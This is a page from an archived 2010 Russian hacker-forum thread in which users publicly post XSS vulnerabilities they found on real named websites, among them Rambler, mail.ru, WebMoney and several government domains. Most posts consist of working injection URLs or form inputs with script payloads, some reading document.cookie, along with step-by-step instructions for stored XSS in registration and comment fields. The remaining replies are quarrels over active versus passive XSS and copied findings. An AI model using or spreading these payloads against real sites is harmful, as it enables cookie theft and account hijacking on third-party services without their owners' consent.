Форумы на Хакер

Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.

Ваши XSS на популярных сайтах.

Пользователи, просматривающие топик: none

Зашли как: Guest

Все форумы >> [Уязвимости] >> Ваши XSS на популярных сайтах.

Имя

Сообщение

<< Старые топики Новые топики >>

Ваши XSS на популярных сайтах. - 2010-03-29 22:10:04.386666

$r00tk1t$

Сообщений: 84
Оценки: 0
Присоединился: 2010-03-13 14:21:48.886666

Предлагаю выкладывать найденные XSS уязвимости на более менее популярных сайтах.

XSS уязвимости выкладываем свои! Не с других ресурсов!

Post #: 1

RE: Активные XSS на популярных сайтах. - 2010-03-29 22:11:27.350000

$r00tk1t$

Сообщений: 84
Оценки: 0
Присоединился: 2010-03-13 14:21:48.886666

Вот пример постинга XSS уязвимостей.

[Xss на WebMoney]

quote:

1. Заходим на –> https://files.webmoney.ru/

2. Создаем папку со следующим содержанием:

<sсriрt>alert()</scrip><h1>xakep.ru by rootk1t</h1>

Видим всплывающее окно
Обновляем страницу, видим опять его опять =)))

Post #: 2

RE: Активные XSS на популярных сайтах. - 2010-04-03 07:47:37.850000

Rezz

Сообщений: 307
Оценки: 0
Присоединился: 2009-09-04 11:21:33.213333

А че base64 никем не используется???

Post #: 3

RE: Активные XSS на популярных сайтах. - 2010-04-06 07:29:06.510000

Dr.Denim

Сообщений: 71
Оценки: 0
Присоединился: 2010-04-03 18:25:21.376666

Смысла не вижу =))

Post #: 4

RE: Активные XSS на популярных сайтах. - 2010-04-07 07:48:49.640000

Brutick

Сообщений: 8
Оценки: 0
Присоединился: 2010-04-07 07:29:25.673333

XSS на рамблере
http://tv.rambler.ru/settings.html?cid="><script>alert(document .cookie)</script>

Post #: 5

RE: Активные XSS на популярных сайтах. - 2010-04-08 00:26:52.960000

Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333

Еще xss на рамблере
http://help.rambler.ru/feedback.html?fio=%22%3E%3Csсriрt%3Ealert(document.cookie)%3C/sсriрt%3E XSS на hosting.mail.ru
http://hosting.mail.ru/basket.jsp?delete=%22%3E%3Csсriрt%3Ealert(document.cookie)%3C/sсriрt%3E

Post #: 6

RE: Активные XSS на популярных сайтах. - 2010-04-08 07:35:05.883333

Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333

XSS на гугле

quote:

http://google.ftpsearch.com.ua/index.php?mode=search&ie=windows-1251&q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&meta=

sport.gala.net и другие сервисы данного ресурса, в строке поиска:

quote:

"><script>alert(document.cookie)</script>

matrix.ua

quote:

http://matrix.ua/search/?keyword=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

quote:

http://matrix.ua/shop/?c_id=1&sc_id=84&chars="><script>alert(document.cookie)</script>

Post #: 7

RE: Активные XSS на популярных сайтах. - 2010-04-11 19:09:19.073333

Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333

http://skater.ru/video/search.php
В строке поиска:

quote:

"><bоdу оnlоаd=alert(/xss/)>

Post #: 8

RE: Активные XSS на популярных сайтах. - 2010-04-11 20:52:44.320000

Sрam

Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666

quote:

http://www.aerotravel.ru/mod_search/index.php
В строке поиска:
quote:

'><sсriрt>alert('xss')</sсriрt>

Может я не ту траву курю, но у меня не работает, скорее всего уже прикрыли….

Post #: 9

RE: Активные XSS на популярных сайтах. - 2010-04-11 21:00:31.513333

Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333

quote:

ORIGINAL: Sрam

quote:

http://www.aerotravel.ru/mod_search/index.php
В строке поиска:
quote:

'><sсriрt>alert('xss')</sсriрt>

Может я не ту траву курю, но у меня не работает, скорее всего уже прикрыли….

Уже прикрыли[:(]

Post #: 10

RE: Активные XSS на популярных сайтах. - 2010-04-12 16:12:32.910000

Ctacok

Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333

Написанно Активные XSS, они блин все пассивные выкладывают.

Post #: 11

RE: Активные XSS на популярных сайтах. - 2010-04-12 16:57:39.720000

Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333

1. Заходим–> http://stranamasterov.ru/user/register
2. Уязвимое поле "Откуда:"
3. Вводим:

quote:

<script>alert()<script>

Post #: 12

RE: Активные XSS на популярных сайтах. - 2010-04-12 17:06:09.296666

DimonHaker

Сообщений: 444
Оценки: 0
Присоединился: 2009-11-20 17:42:29.216666

чёто фак показывает

Post #: 13

RE: Активные XSS на популярных сайтах. - 2010-04-12 17:07:53.943333

Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333

1. Заходим–> http://www.tourjournals.ru/user/register
2. Уязвимые поля:

"Настоящее имя и фамилия (по желанию):"

"Немного о себе:"

"Откуда Вы?:"

"Домашняя страничка:"
3. Вводим:

quote:

<script>alert()<script>

Post #: 14

RE: Активные XSS на популярных сайтах. - 2010-04-12 17:09:11.566666

Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333

quote:

ORIGINAL: DimonHaker

чёто фак показывает

У меня всё работает (алерт просто уже бесит[sm=ag.gif])

Post #: 15

RE: Активные XSS на популярных сайтах. - 2010-04-12 22:15:14.293333

Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333

1. Заходим–> http://www.daler.ru/wallpapers/games/9.html
2. Выбираем картинку.
3. Уязвимые поля:

Коменты на картинки (все поля)
4. Вводим:

quote:

<sсriрt>alert(/XSS/)<sсriрt>

Например–> http://www.daler.ru/open/games/motorstorm/18597_5.html

Post #: 16

RE: Активные XSS на популярных сайтах. - 2010-04-12 22:24:09.340000

MERRON

Сообщений: 456
Оценки: 312
Присоединился: 2009-05-05 12:42:29.883333

http://www.bolero.ru
В поле Поиск: <sсriрt>alert()</sсriрt> Думаю нужно переименовать тему на просто "XSS уязвимости"

Post #: 17

RE: Активные XSS на популярных сайтах. - 2010-04-12 22:27:24.386666

Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333

http://lib.aldebaran.ru/search/

quote:

<bоdу оnlоаd=alert(/xss/)>

quote:

ORIGINAL: MERRON

Думаю нужно переименовать тему на просто "XSS уязвимости"

Согласен, или дописать: "Ваши XSS уязвимости".

Post #: 18

RE: Активные XSS на популярных сайтах. - 2010-04-12 22:42:12.220000

Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333

http://obereg.ru/search_country_side.php?id=2002"><script>alert()</script>

http://fondsk.ru/articlelist.php?search="><script>alert()</script>

http://www.democracy.ru/publications/index.php?pub_num_pg=2"><script>alert()</script>

http://bunny.frozenreality.co.uk/archive.php?end=51&start=1"><script>alert()</script>

http://www.uralaz.ru/news.php?id=2"><script>alert()</script>

Post #: 19

RE: Активные XSS на популярных сайтах. - 2010-04-12 22:44:25.390000

oRb

Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000

Alex.Black, разницу между активными и пассивным XSS знаете?

Post #: 20

RE: Активные XSS на популярных сайтах. - 2010-04-12 22:53:07.933333

MERRON

Сообщений: 456
Оценки: 312
Присоединился: 2009-05-05 12:42:29.883333

Своими словами: Активная XSS работает независимо от того, что в url-строке. То есть остается в коде страницы.

Post #: 21

RE: Активные XSS на популярных сайтах. - 2010-04-12 22:54:00.950000

Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333

Пассивные - это XSS, которые требуют от жертвы непосредственного участия.

Активные - это XSS, которые, не требуют никаких дополнительных действий со стороны жертвы.

Post #: 22

RE: Активные XSS на популярных сайтах. - 2010-04-13 10:39:21.333333

oRb

Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000

При активной xss полезная нагрузка хранится на сервере. При пассивной, передается клиентом.
Поэтому все что вы тут отписали, по сути, оффтоп.

Post #: 23

RE: Активные XSS на популярных сайтах. - 2010-04-15 17:42:52.210000

zer0day

Сообщений: 9
Оценки: 0
Присоединился: 2010-04-15 17:36:11.863333

http://www.export.gov/searchresults/index.asp?q="&gt;&lt;ScRiPt&gt;alert(/zer0day/)&lt;/ScRiPt&gt;&site=export&client=default_frontend&output=xml_no_dtd&searchdb=all&TabIndex=1

http://www.georgia.gov.ge/?lang=2%22%3E%3CScRiPt%3Ealert(/zer0day/)%3C/scRiPT%3E&event=2&topid=1&botid=0&page=1
http://www.georgia.gov.ge/?lang=2%22%3E%3CScRiPt%3Ealert(document.cookie);%3C/ScRiPt%3E&event=2&topid=1&botid=0&page=1
http://www.investingeorgia.org/search/?q=%22%3E%3CScRiPt%3Ealert(/zer0day/)%3C/ScRiPt%3E&x=0&y=0

Post #: 24

RE: Активные XSS на популярных сайтах. - 2010-04-17 11:34:47.290000

BlinccAttack

Сообщений: 136
Оценки: 0
Присоединился: 2009-09-12 03:23:33.973333

А XSS с античата…Не стыдно молодой человек?

Post #: 25

RE: Активные XSS на популярных сайтах. - 2010-04-17 11:35:00.053333

total90

Сообщений: 15
Оценки: 0
Присоединился: 2009-09-03 19:11:39.676666

Alex.Black, круто брать ксс с античата, выкладывать тут, и тем самым показывать что они твои, м?

Post #: 26

RE: Активные XSS на популярных сайтах. - 2010-04-17 13:19:51.066666

Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333

Было всего-то один раз… Но больше не беру:)

Заходим

http://www.uralaz.ru
Пишем в поиск по сайту <sсriрt>alert("xss")</sсriрt>

Post #: 27

RE: Активные XSS на популярных сайтах. - 2010-04-17 15:16:05.873333

Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333

Заходим

http://ww.dubna.org
Пишем в поиск по сайту <sсriрt>alert("что-то")</sсriрt> Скрин: http://i053.radikal.ru/1004/5a/b1495f2fc5b7.png

quote:

ORIGINAL: FriLL

Alex.Black мы уже поняли что ты можешь найти XSS уязвимость, но речь идет о популярных сайтах, а не о тех на которых ты что-то нашел

Ладно, будем искать:)

Post #: 28

RE: Активные XSS на популярных сайтах. - 2010-04-17 17:01:30.833333

FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333

Alex.Black мы уже поняли что ты можешь найти XSS уязвимость, но речь идет о популярных сайтах, а не о тех на которых ты что-то нашел

Post #: 29

RE: Активные XSS на популярных сайтах. - 2010-04-18 11:34:26.993333

zer0day

Сообщений: 9
Оценки: 0
Присоединился: 2010-04-15 17:36:11.863333

http://webxakep.net/FAQ/mini_editor.php

"><script>alert("xss")</script>

:lamo

Post #: 30

RE: Активные XSS на популярных сайтах. - 2010-04-20 19:51:14.523333

Sрam

Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666

quote:

ORIGINAL: zer0day

http://webxakep.net/FAQ/mini_editor.php

"><script>alert("xss")</script>

:lamo

Ты куда скрипт запихивал?

Post #: 31

RE: Активные XSS на популярных сайтах. - 2010-04-20 20:36:32.430000

MERRON

Сообщений: 456
Оценки: 312
Присоединился: 2009-05-05 12:42:29.883333

quote:

http://webxakep.net/FAQ/mini_editor.php

"><sсriрt>alert("xss")</sсriрt>

Не работает

Post #: 32

RE: Активные XSS на популярных сайтах. - 2010-04-22 16:53:50.170000

zer0day

Сообщений: 9
Оценки: 0
Присоединился: 2010-04-15 17:36:11.863333

странно.. работало.. ну один х… "><ScRiPt>alert("xss")</ScRiPt> так робед вводим нажимаем предосмотр.

Post #: 33

RE: Активные XSS на популярных сайтах. - 2010-04-22 17:06:40.163333

Sрam

Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666

quote:

странно.. работало.. ну один х… "><ScRiPt>alert("xss")</ScRiPt> так робед вводим нажимаем предосмотр.

Эффект равен нулю…

Post #: 34

RE: Активные XSS на популярных сайтах. - 2010-04-23 18:02:23.456666

sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000

quote:

ORIGINAL: Sрam

quote:

ORIGINAL: zer0day

http://webxakep.net/FAQ/mini_editor.php

"><sсriрt>alert("xss")</sсriрt>

:lamo

Ты куда скрипт запихивал?

[sm=ai.gif]Не ожидал тама увидеть багу….

Post #: 35

RE: Активные XSS на популярных сайтах. - 2010-04-23 20:48:02.460000

sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000

http://www.mail.md/index.php?lang='%22--%3E%3Cscript%3Enetsparker(0x000041)%3C/script%3E

Post #: 36

RE: Активные XSS на популярных сайтах. - 2010-04-24 08:21:26.496666

zer0day

Сообщений: 9
Оценки: 0
Присоединился: 2010-04-15 17:36:11.863333

quote:

ORIGINAL: Sрam
Эффект равен нулю…

лень в другом браузере посмотреть эффект?

не знаю у кого, как в хроме все норм работает.

Post #: 37

RE: Активные XSS на популярных сайтах. - 2010-04-24 16:40:27.476666

sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000

http://www.yellowpages.uz/catalog/catalog.php?lang='"--&gt;&lt;script&gt;alert(0x000174)&lt;/script&gt;&mode=&chapter_id=&rubric_id=&company_id=&type=pages

Post #: 38

RE: Активные XSS на популярных сайтах. - 2010-05-03 11:11:23.686666

Sрam

Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666

Из моей серии gov.ru доменов:

http://www.mchs.gov.ru/rc/corruption/?ID=20601&rc_id=northwest"><sсriрt>alert(111)</sсriрt>
Предупреждение всем - посты, не содержащие полезной информации в этой теме (равно как и в "Ваши sql/php-инъекции") - будут удаляться, авторам таких сообщений будет выставлен пред за оффтоп
__________________________________________________________________________________________________________
PPS Паш я конечно понимаю что мои посты тебе очень нравятся, но почему именно в МОЕМ надо было объяву повесить?

Post #: 39

RE: Активные XSS на популярных сайтах. - 2010-05-19 23:24:17.753333

FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333

Тема называется
Активные XSS на популярных сайтах.

Если вам непонятно любое из 2 значений обращайтесь в гугл

Post #: 40

Страниц: [1] 2 3

Все форумы >> [Уязвимости] >> Ваши XSS на популярных сайтах.

Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.